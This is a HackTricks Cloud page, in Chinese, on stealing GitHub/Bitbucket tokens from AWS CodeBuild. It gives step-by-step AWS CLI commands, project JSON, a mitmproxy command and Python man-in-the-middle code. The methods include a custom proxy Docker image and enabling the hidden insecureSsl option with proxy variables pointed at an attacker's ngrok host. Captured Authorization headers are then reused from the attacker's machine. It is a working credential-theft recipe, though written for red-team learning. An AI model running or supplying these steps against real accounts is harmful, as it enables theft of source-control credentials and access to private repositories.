AWS Codebuild - Token Leakage

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 @hacktricks_live** 上关注我们。**
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

恢复 Github/Bitbucket 配置的令牌

首先，检查是否配置了任何源凭据，以便您可以泄露：

aws codebuild list-source-credentials

通过 Docker 镜像

如果你发现例如 Github 的认证已在账户中设置，你可以通过让 Codebuild 使用特定的 docker 镜像 来运行项目的构建，从而提取该访问（GH token 或 OAuth token）。

为此，你可以 创建一个新的 Codebuild 项目 或更改现有项目的环境以设置 Docker 镜像。

你可以使用的 Docker 镜像是 https://github.com/carlospolop/docker-mitm。这是一个非常基础的 Docker 镜像，将设置 环境变量 https_proxy、http_proxy 和 SSL_CERT_FILE。这将允许你拦截在 https_proxy 和 http_proxy 中指示的主机的大部分流量，并信任在 SSL_CERT_FILE 中指示的 SSL 证书。

创建并上传你自己的 Docker MitM 镜像

按照仓库的说明设置你的代理 IP 地址并设置你的 SSL 证书，然后 构建 docker 镜像。
不要设置 http_proxy 以避免拦截对元数据端点的请求。
你可以使用 ngrok，例如 ngrok tcp 4444 来将代理设置为你的主机。
一旦你构建了 Docker 镜像，将其上传到公共仓库（Dockerhub, ECR...）。

设置环境

创建一个 新的 Codebuild 项目 或修改现有项目的环境。
设置项目使用 之前生成的 Docker 镜像。

在你的主机上设置 MitM 代理

如 Github 仓库 中所示，你可以使用类似的东西：

mitmproxy --listen-port 4444  --allow-hosts "github.com"

使用的 mitmproxy 版本是 9.0.1，据报道在版本 10 中这可能无法工作。

运行构建并捕获凭证

您可以在 Authorization 头中看到令牌：

这也可以通过 aws cli 以类似的方式完成

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

通过不安全的SSL

Codebuild 项目有一个设置叫做 insecureSsl，这个设置在网页上是隐藏的，你只能通过API进行更改。启用此选项后，Codebuild可以连接到存储库 而不检查 平台提供的证书。

首先，你需要使用类似以下的命令来枚举当前配置：

aws codebuild batch-get-projects --name <proj-name>

然后，使用收集到的信息，您可以将项目设置 insecureSsl 更新为 True。以下是我更新项目的示例，请注意最后的 insecureSsl=True（这是您需要从收集的配置中更改的唯一内容）。
此外，还要添加环境变量 http_proxy 和 https_proxy，指向您的 tcp ngrok，如下所示：

aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "https://2.tcp.eu.ngrok.io:15027"
}
]
}'

然后，在代理变量指向的端口（http_proxy 和 https_proxy）运行来自 https://github.com/synchronizing/mitm 的基本示例

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

最后，点击 Build the project，凭证将以明文（base64）发送到 mitm 端口：

通过 HTTP 协议

这个漏洞在 2023 年 2 月 20 日那一周的某个时候被 AWS 修复了（我想是星期五）。所以攻击者无法再利用它了 :)

具有 提升权限的攻击者在 CodeBuild 中可能会泄露配置的 Github/Bitbucket 令牌，或者如果权限是通过 OAuth 配置的，则 用于访问代码的临时 OAuth 令牌。

攻击者可以将环境变量 http_proxy 和 https_proxy 添加到 CodeBuild 项目，指向他的机器（例如 http://5.tcp.eu.ngrok.io:14972）。

然后，将 github 仓库的 URL 更改为使用 HTTP 而不是 HTTPS，例如：http://github.com/carlospolop-forks/TestActions
然后，在代理变量（http_proxy 和 https_proxy）指向的端口上运行 https://github.com/synchronizing/mitm 的基本示例。

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

最后，点击 Build the project，凭证将以明文（base64）发送到 mitm 端口：

现在攻击者将能够从他的机器上使用令牌，列出它拥有的所有权限，并且比直接使用 CodeBuild 服务更容易（滥用）。

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

PreviousAWS - CodeBuild Post Exploitation NextAWS - Control Tower Post Exploitation

Last updated 3 days ago